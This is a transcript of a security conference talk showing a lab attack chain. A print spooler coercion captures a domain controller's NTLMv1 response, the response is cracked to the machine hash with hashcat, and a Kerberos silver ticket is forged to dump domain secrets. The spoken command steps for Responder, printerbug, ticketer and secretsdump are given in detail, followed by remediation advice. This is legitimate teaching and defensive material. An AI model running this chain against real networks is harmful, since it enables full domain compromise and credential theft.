Evil Mog: From Print Spooler to Kerberos Silver Tickets

i'm going to get kicking this off with some introductions so i am evil mog and this is domain compromise through print spoolers i'm a hacker over at xforce red in fact let's go pull up my bio over here so i am evil mog from team hashcat also from x-force red i have a bunch of certs you probably don't care about those and i have a black badge collection addiction i've presented at multiple conferences and i can be twitter stalked at evil underscore mog easy enough so while we're here see if i can type today we're here to talk about the ntlm version one packet and why we can abuse it to take over a domain controller so

basically what this attacking what demonstrates going to do is you as an attacker can send a printer request via the msrprn print spooler notify service to a domain controller that domain controller then sends you back a notification of all of your printers now this is an authenticated request you need domain user credentials and the cool part about this is you can because the dc is connecting back to you you can force it to authenticate and when it authenticates it authenticates as its domain controller machine credentials so if you can get it connect back to you with an ntlm version 1 response we're about to go demo how we can reverse this now first though the

settings that actually um apply to this though are set in group policy so if you want to find these settings you can go here the computer configuration window settings security settings local policies security options or this entry in the registry in order for this attack to work you need to have one of the following settings set so these settings were typically set on domain controllers that were built as a server 2003 and then migrated back when we had things like windows xp windows nt windows 2000 etc so the setting of send lm and ntlm response is you know kind of bad even worse even if you're sending an lm response back on settings with zero one or two

any one of these should be uh suitable for you to um attack now the evil part is some people have set what's called the mode two which is requires um or disables the landman authentication portion okay now no worries that's easy enough we can still break that with the ssp which i'm going to demo in a few moments here so first let's look at an ntlm version 1 response so right now this is a complete message we're going to break this out the first part of this is you're going to see the domain controller which is the machine account we're authenticating with the domain we're authenticating with this is what's called the landman response this is the nt response and this is your

client challenge now you notice all these zeros here this is what makes reversing ntlm version one with ssp to ntlm harder stops using things like crack.sh so if we look at the landman response section you'll notice all those zeros okay that's that's our primary clue here's the nt response and here's our client challenge now i mentioned something called ssp ssp is a protection method used to prevent some evil attacks against ntlm basically it prevents the use of rainbow tables by modifying the client challenge so if we look at our landman response above we only really care about the significant portions of it minus all the zeros then we care about the client challenge which is set in an ntlm version one

which is you know the client's nonce you combine those together to create what's called the combined challenge then you md5 those and take the first 16 characters of that md5 you know string and that basically becomes your new combined challenge now why this is important is we're about to do some entertaining demos so cut my steps while i'm here so first thing we're going to do is i'm going to pull into impact and we are going to look up the domain sid of the domain we are going to attack so look up sid dot py uh we're gonna go to mog slash evil mog slot or at mog.local in this case is password exclamation mark and what we're looking for

is this domain security identifier right here we're going to use this later so i'm going to copy that go export sid equals and just to prove i've nothing up my sleeve i'm going to pull up crackmap exec let me use the user credentials i just typed in evilmog p password exclamation mark if i could type today so no special privileges nothing scary we're all nice and good so next thing i'm going to do is i'm going to start up responder i attack wrf fp and i'm not doing this with the tactac lm although you normally would use this for this attack to use crack.sh i'm going to demonstrate it with hashcat because i feel like living dangerously

oops and make sure you set your ethernet interface to ethernet zero okay now we're listening now we're gonna go into the krb relay x from dirk gen m's repo and in here there is a print or printer bug tool so python 3 printer bug we are then going to go mog evilmog at dc1.mog.local192 168. which is my attacker machines ip we're gonna kick this thing off it's gonna ask me for a password we're gonna turn that password and we'll see here we have a nice shiny ntlm version one response this is perfect so we'll pull up a tool that i wrote called the ntlmv1 multitool so we're gonna run python or python3 sorry because i updated it

recently ntlm we're gonna paste our results in here we're gonna hit enter

there now we're good so what the ntlm version when multi-tool does is it splits up your hash into components that can be used for cracking it into or reversing it technically using the des mode 114 000 into a hash so what we're going to do is because this has ssp it tells us here's your current client challenge here's the significant portions of the landman response here's your nice and shiny combined challenge here's the md5 hash of the combined challenge now why this is important is the new client challenge that we use for cracking purposes is this srv challenge which is the first 16 characters of this md5 hash okay easy enough so i had a nice little tool in this to

make my life a little easier so we're going to do is type in tact hashcat give it my hashcat path is tilt slash get slash hashcat slash hashcat yes or no i have it double nested and we're going to tell where these details are and that is going to be tilde get slash hashcat bash utils tech xrc again because i am lazy so now if we go find out the last four characters of the ntlm hash of domain controller machine hash we just copy straight out of the tool what this does is this uses the hashcat utilities ct3 to ntlm bin properly formatted to extract out the last four characters because we'll just get crack it

in real time next thing we're going to do is we're going to tell this rm1 4000.hash which is my last one all you do is you copy these two components to use the hashcats mode 14000 also i should point out that if you want to use crack.sh we do output crack.sh tokens using the tools so you can save yourself some time and or money but if you happen to have a cluster this works just as well so now that we've input this it tells you exactly how to crack this with hashcat but in my case because i already have the keys i'm going to make this a little bit different i'm just going to copy the

first bit of this i'm going to go deck a0 um dez.cand and dash there we go that should work and then it's uh one four hundred or one four thousand dot hash oops got those in the wrong order that happens it's actually there we go one four thousand dot hash des.cand voila we've now cracked the hash so if we go back to our original tool if you use its output that it gives you you have to go crack with hash cat it'll say hey this thing's been already cracked oh and because i'm using csh you got to put quotes around it no biggie yep see i already crashed so we go to show now right here we have the des

key is the des known plain text attack effectively you need to convert this dez key into an ntlm hash so what we're going to do is we're going to go till slash get slash cat slash hash cat dash utils des one sec src slash des that's why bug hash cat dash utils slash src slash des key to ntlm we'll copy this first portion there's part one here is part two and then like i said we copied out this piece from our ct3 which we need to get the last four digits there we go so our ntlm hash of the domain controller's machine account it's basically this now what can you do with a domain controller machine a cache account hash

well let's go create a silver ticket with it so i'm going to copy you back to my initial box we're going to go export we're going to control codu export nt hash equals all right and let's go verify that this is actually correct crap map exec smb 192 168.1.3 attack u dc one dollar sign is its machine account name tac h is the dollar's nt hash bingo so now we've verified that this machine account hash is correct so now we need to create a ticket with it so we use our favorite tool called ticketer so python3 ticker.py we're going to go with dak nt hash dollars nt hash yeah we're gonna go deck domain tax sid

dollar sid we're gonna go with domain of mog.local dash spn of host slash dc1 dot mog dot local and we tell it my mini account is the administrator admin is straighter there we go so the important part about this is you give it the nt hash of your domain or your domain machine account you give it the domain sid you tell it the domain then the spn here is always gonna be host slash or not always but in most cases host slash and then the domains or the uh like dns name of the account you're gonna go attack so we're gonna hit enter here oops yeah i missed one thing change you to a quote

so we've now actually saved our ticket as administrator.c cash which is fantastic i'm going to go export that so it can be used by secret stump easy enough now we're going to secret stump this and this is the moment of truth hopefully i did not screw this up voila we now have ourselves a uh a dump you might sometimes have to run it twice because this has the new zero log on code that dumps the plain text master password also of the machine account so domain machine accounts are 128 characters long randomly generated in most cases so they're hard to even display on a terminal but this will pull it straight out nice and easy shows here's the default

password of this component here we've got our you know straight out dc sync and yes my administrator account and my evil mog account have the same password of password exclamation mark again great for testing so that is that component of it now let's get back to my agenda so now the important part about this is remediation obviously if you can't remediate this it's not important so let's go back to i adtock cat all right let's go clear the screen here cat settings to so if you're setting up your environment what you really want to do is make sure that you have set that landman settings now let's get the gpo over here gpo gpo cat registry

you want to set this registry area this registry or security setting to use a setting of five what this does is sends only ntlm version two responses refuses landman and ntlm this is important because it also blocks a number of other attacks that may use the lm v2 cat field in section or if you're using the setting four this is actually also set in most cis benchmarks so go in check your uh group policy settings to make sure this setting right here is set at level five in order to stop this attack now for the mandatory credits because i like to give credit to people the person who discovered this originally was tiffkin from spectreops

and it led to a whole series of attack techniques you can also relay these attacks if you've got um say do this on exchange server um you can silver ticket just a single server if you've found it box using individual settings it's fairly useful there and the kirby relay x code was stolen from dirk gen molema um i can never pronounce his last name right so i apologize but there's his code and last but not least the ntlm view on multi-tool which i wrote which is based off of moxie marlinspike's research and adam from team hashcat's research is located right here to automate your life again you can use the crack club sh because we put out their compatible

tokens but if you have gpus hashcat works just fine this should take about five to seven days on it's called 16 to 32 gpus and with that i will open this up to

questions

i'm requesting the queue what's that request look like

all right do i know any implications while setting this on a dc so the important part of this is if you have any really legacy systems such as windows 2000 windows nt older systems that do not com or communicate with ntlm version one those shouldn't be on your environment anyways this really was a setting that was used for compatibility back in i want to say early 2000s ish nowadays now it's 2020 there's no reason to have this applied unless you're linking up something really ancient um then the second question was from chris timmons there can you force a client to use ntlm even if the gpo is set there are some techniques such as registry settings um you already have to

have admin on it so from an attacker's perspective no but if you have say local admin on a box that you can't mimikats there is the internal monologue attack that can speak ntlm version one but that wouldn't really apply in this case do we have any other questions while we are here i know this was a really quick whirlwind uh

demonstration

oh and then if you want to know how i created the terminal graphics um that was created with mono draw for the ascii art and then a tool called libsixel for converting pngs directly into the terminal so i can avoid powerpoint

and that's really about it i guess more people are joining in so i could almost do this a second time if people want it

bueller bueller yeah you got screw let's run this twice i'm in a good mood so let's go run this demo again so i'll go back to my initial response um for those of you who literally just joined in let's do this a second time so cat i am evil mog easy enough i you know i do stuff with hashes i crack things what we're here to talk about is this particular registry setting the ntlm or the landman compatibility level and how it can take down your environment because of the print spooler so the settings we were talking about again which we were talking about here the vulnerable settings if you have either of these three

settings set um send lm and ntlm responses send element ntlm but use ntlmv2 if negotiated or send ntlm response only any of these three settings will make this attack work so we're looking at a standard ntlmv1 response or the process of how this works so basically how this works is we have our attacker we're to send a printer request to a domain controller and by the way the print spooler runs on every computer by default including your domain controllers so you may want to disable the print spooler on security sensitive systems if you disable the principle or service however it will prevent a service that works that updates clients on their domain controller on their

existing printers so it will cause some domain functionality breaks but yeah the way this works is attacker sends a printer request to the domain controller or any other server for that matter it replies back with here's your printer list and on that printer list notify back we send an ntlm challenge to the domain controller if it sends an ntlm version 1 response back we're basically in business and the way of v1 response looks is we have this blob that comes back so in it is your domain controller which is basically your machine account name in this case you have your domain name which fills the name of the host name we have a lan man response which is this

section right here note that this is using something called ssp which is a protection method used to prevent rainbow tables on the ntlm version 1 response if you use crack.sh to crack these it costs about 200 bucks and takes about three days if you have a hashcat cluster of about 16 gtx 1080s you can do it in anywhere from three to five days all the way up to seven this is the nt response field which is the second portion of it and this is your client challenge now this gets modified because we are using ssp so again here's our landman response here is the nt response here is the client challenge now the way ssp works is

the client challenge that you set as the challenger gets modified so what we do is we take the significant portions of the len man response before the zeros we take the client challenge we combine them together to create what's called a combined challenge you then run md5 over that combined challenge and take the first 16 characters that gives you your new modified challenge so in order to demo this whole thing what we're going to do is we're going to go clear i'm going to clear this we're gonna go cat steps because i write this stuff down and we're gonna go first of all we're gonna look up the domain sid this is the most important step of this because

without the domain sid we can't afford ourselves a silver ticket so we to look up p y mog evil mog at mog.local

ipad look up sid all right so my password in this case is password exclamation mark just to make life easy and we see here our domain sid is this this is the security identifier of the domain we're going to export this so i don't have to remember it later and to prove i get nothing up my sleeve map exec smb 192 168.1.3 attack u evil mog tech p password exclamation mark so i'm not cheating this shows is a regular green i've got no special admin privileges we are good to go in that regard so from here i'm going to kick off responder and we're going to do this without tac-tac lm because i feel like being

unique so what we're doing is we're running responder on our ethernet 0 and we're telling it to um wait for a challenge i'm also going to do this responder.db and delete that database that's because what it does is it'll cache the challenge it's received and uh stop issues now i've got myself a random so you shouldn't cause problems but for demo purposes clear your responder db because that's reasonably important now we're gonna go into the krb relay x demo we're gonna run python 3 bug we use mog which is my domain name i'm going to do this evil mog at dc1.mog.local 192.168.1.128 which is my attacker ip it's going to send me an effect or send an

authentication to the host it's going to i'm going to type my password in here it's going to authenticate back to me as the domain controller and this ntlm version 1 has changed which is fantastic so what we're going to do is we're going to take this ntlm version 1 or to put it into the ntlm v1 multi tool so python 3 ntlmv1.py techdeck ntlm type my stuff in here now we're also going to go tac-tac hashcat tell it my hashcat path which in this case is tilde get slash cat slash hashcat and then we tell them where my hashcat utilities are which is going to be tilde get slash cat slash cat dash utils all right cool so now we need to go

figure out how to crack this hash so i'm going to go rm my fourteen thousand dot hash i'm gonna go echo out what the tool gives me now what this is this is basically a uh des known cipher text or does known plain text attack and the key that we generate out of this from hash cat is that gonna get converted into the ntlm hash so we've now set up our uh component now because i already know what the uh passphrase is or the hash is on this i'm gonna just make our lives easy mode 14 000 attack mode 0 we're going to go 14 000. we're going to go des.cand and let this go all right cool

so we've cracked this now we're going back to our original output to prove that i'm not lying in my tool we're just going to type this out as is now because i'm using zsh i need to wrap my mask in quotes so see here we've already cracked all our hashes so we're going to show those now so here is the components of our password hash so first thing we're going to do is go get slash hash cat dash utils source ct3 or we're going to add des key to ntlm and we take this component inside the hex there is part one there is part two and now the last most important part we're going to crack

ct3 using the tools output so this will give you the last four characters oops

i set my path wrong that's fine [Music] src there we go so bb0 so our hash winds up looking like this

this this so i'm going to copy that i'm going to go export nt hash equals that and this is now our nt hash perfect so now the most the next part of this whole thing is we're going to go create a silver ticket so the tool in the impact utilities is ticketer so dot slash ticketer dot p y we are going to go dash n t hash dollars nt hash tag domain tax sid dollar sid domain is going to be evil or mog.local wrong domain we're gonna go dash spn which is gonna be uh host slash dc1.mog.local.com and then we are going to go with the administrator user who isn't admit lowercase in the spn my bad

there we go so we've saved our ticket to the administrative.c cache now what you need to do is run an export on this a carat b5 c cache name like this tell it where our c cache is and then we're going to run secrets dump with the k and no pass that way it uses a kerberos ticket to secret stump the dc and here we are so we've now secrets dumped the dc occasionally my version blows up because i got it set up for zero log on but now it actually pulls up a second time so you'll see here we have our sam from this before this is a dc or dp api and you have your full proper secret

stump relatively easy so if we go back to our agenda cat agenda so the tools we used for this was the ntlm v1 multi tool uh whoops cat onto four

this was discovered by a couple of awesome people so lee christensen discovered the original print spooler msrprn exploit vector dirk gen malema is the one who wrote kb relay x as well as a lot of the good zero log on code so we abuse a lot of that if you want to remediate this you want to be running on compatibility level five from that registry key we mentioned earlier and again that registry entry was or that policy location register entry was right here and that gives you just about everything we need again i have been evil mog thank you for watching coming to my talk do we have any questions

and everyone caught it that time right

cool well thank you all folks for coming that's been um is there an advantage to reducing the machine password refresh interval um there is and there isn't so basically with the machine password refresh i've seen people reducing it down to as low as a week and that's handy for when your machine gets compromised and it reduces the duration of silver tickets so it won't hurt anything it may not stop this particular attack but it'll definitely reduce the time that attackers in so i do encourage a reduction obviously do your own risk analysis of what it might cause for systems if you have a fairly reliable network with decent dc's it should not be a problem if your time

frame is set to low and a machine's not online it will just check it and expire it when it signs on as opposed to you know automatically expiring it so the risk level is minimal yeah let me go find the link um for that chat bear with me here lm a sec it's uh lm compatibility level i usually have to google for this every single time so what you want to do is go into this link right here and that tells you all about the lan man compatibility level also make sure you disable your print spooler on your domain controllers as well as your exchange servers and anything else that you consider seriously sensitive or don't want me to

look at wrong anybody else cool well thank you all then that i'm going to stop my uh video and screen share and um i can answer questions feel free to reach out on twitter i've got no problem answering questions on there that's generally the primary way of doing things for me and if you have anything else feel free to reach out